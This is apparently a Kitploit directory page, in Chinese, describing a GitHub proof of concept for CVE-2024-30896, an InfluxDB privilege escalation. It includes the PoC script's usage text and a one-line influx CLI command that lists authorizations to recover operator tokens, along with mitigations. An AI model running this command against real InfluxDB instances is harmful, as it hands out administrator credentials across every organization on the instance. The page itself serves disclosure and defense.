Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-30896 — CVE-2024-30896的概念验证漏洞利用,这是InfluxDB中的一个权限提升漏洞,允许allAccess令牌持有者通过授权令牌列表获得操作员级访问权限。 | Kitploit
工具/GitHubGitHub/xenom0rph97/cve-2024-30896
身份验证与授权权限提升漏洞分析漏洞利用云安全数据库安全
GitHubxenom0rph97/cve-2024-30896

CVE-2024-30896

CVE-2024-30896的概念验证漏洞利用,这是InfluxDB中的一个权限提升漏洞,允许allAccess令牌持有者通过授权令牌列表获得操作员级访问权限。

查看仓库
21111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-30896

摘要

influxdb 中存在一个业务逻辑缺陷,允许拥有有效 allAccess 令牌的用户通过列出当前授权令牌,将其权限提升至操作员级别。

场景

攻击者可能是管理员仅通过组织内的 allAccess 令牌授予了访问权限的用户。该用户的权限将允许对组织进行完全控制,但仍会阻止其与其他组织交互。

影响

此漏洞将允许用户获得对 influxdb 实例的未受限访问。类似情况可能完全损害不同组织用户数据的机密性、完整性和可用性。此外,由于操作员令牌具有管理权限,整个 influxdb 实例的可用性和完整性也可能受到损害。

前提条件/限制

  1. 攻击者必须拥有有效的 allAccess 令牌
  2. allAccess 令牌必须创建在操作员令牌所在的组织中(例如,与管理员用户相同的组织)
  3. 攻击者必须能够通过 CLI 或 API(influxClient)与 influxdb 实例交互

复现步骤

情况 1:通过 influxdb API 利用

脚本使用

% python3 ./influxdbPrivescCVE_PoC.py -h
usage: influxdbPrivescCVE_PoC.py [-h] [-t TOKEN] [-e ENDPOINTURL] [-v [VERBOSE]] [-vv [VVERBOSE]]

optional arguments:
  -h, --help            show this help message and exit
  -t TOKEN, --token TOKEN
                        Custom or allAccess token to access influx DB instance
  -e ENDPOINTURL, --endpointUrl ENDPOINTURL
                        Endpoint Url of influxdb instance (ex. "https://myInfluxdbInstance:8086/")
  -v [VERBOSE], --verbose [VERBOSE]
                        Enable verbose logging - INFO
  -vv [VVERBOSE], --vverbose [VVERBOSE]
                        Enable verbose logging - DEBUG

情况 2:通过 influx CLI 利用

  1. 执行:influx auth ls -t <allAccessToken> | grep write:/orgs。这将列出 influxdb 实例上所有当前活跃的操作员令牌。

示例

# 使用 allAccess 令牌
influx auth ls -t U1OuqmFC{REDACTED} | grep U1OuqmFC{REDACTED}

0cc41c3b050e5000							U1OuqmFC{REDACTED}	
admin		0cb9c92ee228b000	[read:orgs/87d0746948a3b3f5/authorizations write:orgs/87d0746948a3b3f5/authorizations read:orgs/87d0746948a3b3f5/buckets write:orgs/87d0746948a3b3f5/buckets read:orgs/87d0746948a3b3f5/dashboards write:orgs/87d0746948a3b3f5/dashboards read:/orgs/87d0746948a3b3f5 read:orgs/87d0746948a3b3f5/sources write:orgs/87d0746948a3b3f5/sources read:orgs/87d0746948a3b3f5/tasks write:orgs/87d0746948a3b3f5/tasks read:orgs/87d0746948a3b3f5/telegrafs write:orgs/87d0746948a3b3f5/telegrafs read:/users/0cb9c92ee228b000 write:/users/0cb9c92ee228b000 read:orgs/87d0746948a3b3f5/variables write:orgs/87d0746948a3b3f5/variables read:orgs/87d0746948a3b3f5/scrapers write:orgs/87d0746948a3b3f5/scrapers read:orgs/87d0746948a3b3f5/secrets write:orgs/87d0746948a3b3f5/secrets read:orgs/87d0746948a3b3f5/labels write:orgs/87d0746948a3b3f5/labels read:orgs/87d0746948a3b3f5/views write:orgs/87d0746948a3b3f5/views read:orgs/87d0746948a3b3f5/documents write:orgs/87d0746948a3b3f5/documents read:orgs/87d0746948a3b3f5/notificationRules write:orgs/87d0746948a3b3f5/notificationRules read:orgs/87d0746948a3b3f5/notificationEndpoints write:orgs/87d0746948a3b3f5/notificationEndpoints read:orgs/87d0746948a3b3f5/checks write:orgs/87d0746948a3b3f5/checks read:orgs/87d0746948a3b3f5/dbrp write:orgs/87d0746948a3b3f5/dbrp read:orgs/87d0746948a3b3f5/notebooks write:orgs/87d0746948a3b3f5/notebooks read:orgs/87d0746948a3b3f5/annotations write:orgs/87d0746948a3b3f5/annotations read:orgs/87d0746948a3b3f5/remotes write:orgs/87d0746948a3b3f5/remotes read:orgs/87d0746948a3b3f5/replications write:orgs/87d0746948a3b3f5/replications]

# 列出所有可用令牌,传递 allAccess 令牌并仅检索操作员级别令牌
influx auth ls -t U1OuqmFC{REDACTED} | grep write:/orgs

0cbb920e128e5000							gerKYLO0Ph_ibUk0y{REDACTED}
admin		0cb9c92ee228b000	[read:/authorizations write:/authorizations read:/buckets write:/buckets read:/dashboards write:/dashboards read:/orgs write:/orgs read:/sources write:/sources read:/tasks write:/tasks read:/telegrafs write:/telegrafs read:/users write:/users read:/variables write:/variables read:/scrapers write:/scrapers read:/secrets write:/secrets read:/labels write:/labels read:/views write:/views read:/documents write:/documents read:/notificationRules write:/notificationRules read:/notificationEndpoints write:/notificationEndpoints read:/checks write:/checks read:/dbrp write:/dbrp read:/notebooks write:/notebooks read:/annotations write:/annotations read:/remotes write:/remotes read:/replications write:/replications]

根本原因

默认情况下,allAccess 令牌拥有列出同一组织中定义的所有授权(无论类型为自定义、allAccess 还是操作员)的权限 -> read:orgs/87d0746948a3b3f5/authorizations。

临时缓解措施

当执行 influx setup 时,会创建第一个(默认)组织,操作员令牌将自动存储在其中。应仅授予用户对次要创建组织的访问权限。 建议创建多个组织,并将不包含操作员令牌的组织传递给用户。

建议

  • 不要共享任何包含操作员令牌的组织
  • 避免将操作员令牌存储在非默认组织中

CVSS 基础评分: 9.1

CVSS v3.1 向量: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

下载工具